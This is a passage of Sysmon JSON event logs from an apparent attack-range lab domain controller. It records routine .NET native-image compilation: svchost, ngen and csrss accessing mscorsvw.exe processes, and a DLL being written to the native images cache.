{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7396,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.715\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-0010CA081000}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.715","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-0010CA081000}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7397,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.824\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-0010500C1000}\r\nTargetProcessId: 588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.824","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-0010500C1000}","TargetProcessId":"588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7398,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.824\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-0010500C1000}\r\nTargetProcessId: 588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.824","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-0010500C1000}","TargetProcessId":"588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7399,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.840\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-0010500C1000}\r\nTargetProcessId: 588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.840","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-0010500C1000}","TargetProcessId":"588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7400,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:05.949\r\nProcessGuid: {A837DB8D-04A9-5F25-0000-0010500C1000}\r\nProcessId: 588\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\24c-0\\System.Data.DataSetExtensions.dll\r\nCreationUtcTime: 2020-08-01 05:59:05.949","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:05.949","ProcessGuid":"{A837DB8D-04A9-5F25-0000-0010500C1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\24c-0\\System.Data.DataSetExtensions.dll","CreationUtcTime":"2020-08-01 05:59:05.949","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7401,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.981\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-0010A97C0F00}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.981","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-0010A97C0F00}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7402,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.981\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-0010A97C0F00}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.981","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-0010A97C0F00}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7403,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.996\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-00101E101000}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.996","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-00101E101000}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7404,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:06.387\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010B7560E00}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 